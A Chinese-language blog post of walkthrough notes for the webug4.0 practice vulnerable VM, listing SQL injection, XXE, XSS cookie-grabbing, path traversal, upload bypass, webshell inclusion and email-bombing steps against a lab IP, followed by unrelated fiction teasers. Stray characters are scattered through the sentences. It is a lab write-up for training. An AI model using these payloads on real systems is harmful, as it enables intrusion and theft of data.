webug4.0 第一關到第三十關筆記

Webug官網(wǎng):http://www.webug.org

一個不錯的靶機酝惧,可以直接下載server2003虛擬機沈善,即可直接打靶:

第一關:顯錯注入

用’會報錯:

url:id=3' UNION SELECT 1,flag FROM flag where flag.id=1 %23

第二關:布爾注入

單引號:url?id=1' and length(user())>15 --+

第三關:延時注入

單引號:url?id=1' and sleep(1) --+,?頁面有明顯的延遲

第四關:Post注入

搜索引號’ 出現(xiàn)報錯頁面

搜索:' or sleep(3) ?#??延時打開成功百新!

第五關:過濾注入(同上)

第六關:寬字節(jié)注入

寬字節(jié)注入原理即是利用編碼轉(zhuǎn)換企软,將服務器端強制添加的本來用于轉(zhuǎn)義的\符號吃掉,從而能使攻擊者輸入的引號起到閉合作用饭望,以至于可以進行SQL注入仗哨。

url?id=1%df',出現(xiàn)錯誤了

第七關:xxe注入

Payload為:data=

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xxe [

<!ELEMENT name ANY>

<!ENTITY xxe SYSTEM "file:///c:/passwd">]>

<root>

發(fā)現(xiàn)不行铅辞,將payload進行url編碼:

成功厌漂!

第八關:csv注入

沒看懂!U迳骸苇倡!

第九關:反射型xss

第十關:存儲型xss

提交內(nèi)容為:alert(document.cookie)<script>alert(document.cookie)</script>

第十一關:萬能密碼登錄

嘗試‘or 1=1 #,成功囤踩!

第十二關:DOM型XSS

在搜索框輸入:" required="">alert(document.cookie)<script>alert(document.cookie)</script><name=",將value閉合旨椒。


第十三關:過濾XSS

<script>被過濾,使用<img標簽>

第十四關:鏈接注入

第十五關:任意文件下載

http://10.254.254.129/control/filedownload/file_download.php?file=template/../../../boot.ini

第十六關:mysql配置文件下載

http://10.254.254.129/control/filedownload/ini_file_download.php?file=../mysql/my.ini

第十七關:文件上傳(前端攔截)

將jpg后綴修改為php堵漱;

第十八關:文件上傳(解析漏洞)

服務端調(diào)整成php-5.3.29-nts+Nginx

成功上傳一句話jpg

利用nginx的解析漏洞訪問:

第十九關:文件上傳(畸形文件)

將1.jpg修改成1.pphphp

第二十關:文件上傳(截斷上傳)

將php切換到小于5.3.4的版本 并把magic_quotes_gpc改為off综慎,00%還是失敗:

把alert('error')改為$file_ext勤庐,嘗試了%00截斷示惊,發(fā)現(xiàn)彈出的是.php而不是.jpg 因此截斷失敗愉镰;

第二十一關:文件上傳(htaccess)

上傳htaccess:

上傳test文件:

訪問:http://10.254.254.129/template/upload/test

第二十二關:越權修改密碼

使用aaaaa賬號進行登錄

使用錯誤密碼也能成功修改aaaaa賬戶密碼,沒有對賬戶的舊密碼進行正誤判斷米罚。令id=1,輸入錯誤舊密碼111111和新密碼222222丈探,可將admin用戶密碼成功修改為222222录择。

第二十三關:支付漏洞

第二十四關:郵箱轟炸

思路是用burpsuit抓取注冊信息,然后在intruder模塊中設置發(fā)送數(shù)量碗降,和郵箱地址隘竭,即可形成郵箱轟炸。

第二十五關:越權查看admin


第二十六關:URL跳轉(zhuǎn)

http://10.254.254.129/control/more/url_redirect.php?url=https://www.baidu.com

第二十七關:文件包含漏洞

執(zhí)行我們上傳的webshell

http://10.254.254.129/control/more/file_include.php?filename=../../template/upload/shell.php

第二十八關:命令執(zhí)行

切換版本至php-5.4.45 + Apache遗锣,再次訪問:

然而沒發(fā)現(xiàn)货裹??精偿?弧圆?請師傅指點!笔咽!

第二十九關:Webshell爆破

對口令進行爆破:

密碼為a1,登錄成功:

第四十關:Ssrf

探測內(nèi)網(wǎng)機器80端口的服務

結語:

??? 剛好刷完了整個靶機搔预,跟各位師傅分享討論一下,多多指點叶组!

?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末拯田,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子甩十,更是在濱河造成了極大的恐慌船庇,老刑警劉巖吭产,帶你破解...
    沈念sama閱讀 219,427評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件鸭轮,死亡現(xiàn)場離奇詭異臣淤,居然都是意外死亡窃爷,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,551評論 3 395
  • 文/潘曉璐 我一進店門按厘,熙熙樓的掌柜王于貴愁眉苦臉地迎上來医吊,“玉大人,你說我怎么就攤上這事逮京。” “怎么了造虏?”我有些...
    開封第一講書人閱讀 165,747評論 0 356
  • 文/不壞的土叔 我叫張陵,是天一觀的道長漓藕。 經(jīng)常有香客問我陶珠,道長,這世上最難降的妖魔是什么享钞? 我笑而不...
    開封第一講書人閱讀 58,939評論 1 295
  • 正文 為了忘掉前任,我火速辦了婚禮暑脆,結果婚禮上,老公的妹妹穿的比我還像新娘添吗。我一直安慰自己,他們只是感情好碟联,可當我...
    茶點故事閱讀 67,955評論 6 392
  • 文/花漫 我一把揭開白布僵腺。 她就那樣靜靜地躺著鲤孵,像睡著了一般辰如。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,737評論 1 305
  • 那天毙玻,我揣著相機與錄音,去河邊找鬼淆珊。 笑死夺饲,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的往声。 我是一名探鬼主播,決...
    沈念sama閱讀 40,448評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼贯涎,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了塘雳?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 39,352評論 0 276
  • 序言:老撾萬榮一對情侶失蹤普筹,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后太防,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體妻顶,經(jīng)...
    沈念sama閱讀 45,834評論 1 317
  • 正文 獨居荒郊野嶺守林人離奇死亡蜒车,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,992評論 3 338
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了沥潭。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,133評論 1 351
  • 序言:一個原本活蹦亂跳的男人離奇死亡钝鸽,死狀恐怖棘伴,靈堂內(nèi)的尸體忽然破棺而出寞埠,到底是詐尸還是另有隱情,我是刑警寧澤焊夸,帶...
    沈念sama閱讀 35,815評論 5 346
  • 正文 年R本政府宣布仁连,位于F島的核電站,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏饭冬。R本人自食惡果不足惜使鹅,卻給世界環(huán)境...
    茶點故事閱讀 41,477評論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望昌抠。 院中可真熱鬧,春花似錦裁厅、人聲如沸侨艾。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,022評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至当叭,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間蚁鳖,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,147評論 1 272
  • 我被黑心中介騙來泰國打工徘跪, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留琅攘,地道東北人垮庐。 一個月前我還...
    沈念sama閱讀 48,398評論 3 373
  • 正文 我出身青樓坞琴,卻偏偏與公主長得像哨查,于是被迫代替她去往敵國和親剧辐。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,077評論 2 355

推薦閱讀更多精彩內(nèi)容

  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載溉奕,對原文中一些明顯的拼寫錯誤進行修正,并標注對自己有用的信息加勤。 ======...
    wind_飄閱讀 2,051評論 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當給sq...
    xuningbo閱讀 10,321評論 2 22
  • DVWA實踐 Web漏洞原理 1. DVWA環(huán)境搭建 Warmpserver+DVWA 2. Brute Forc...
    JasonChiu17閱讀 3,759評論 0 19
  • WEB2 看源代碼得flag 文件上傳測試 找一張圖片上傳鳄梅,截包改后綴名為.php得flag 計算題 F12修改輸...
    a2dd56f6ad89閱讀 18,513評論 0 2
  • sqlmap是一個開源的滲透測試工具,可以用來進行自動化檢測戴尸,利用SQL注入漏洞,獲取數(shù)據(jù)庫服務器的權限孙蒙。它具有功...
    道書簡閱讀 1,414評論 0 0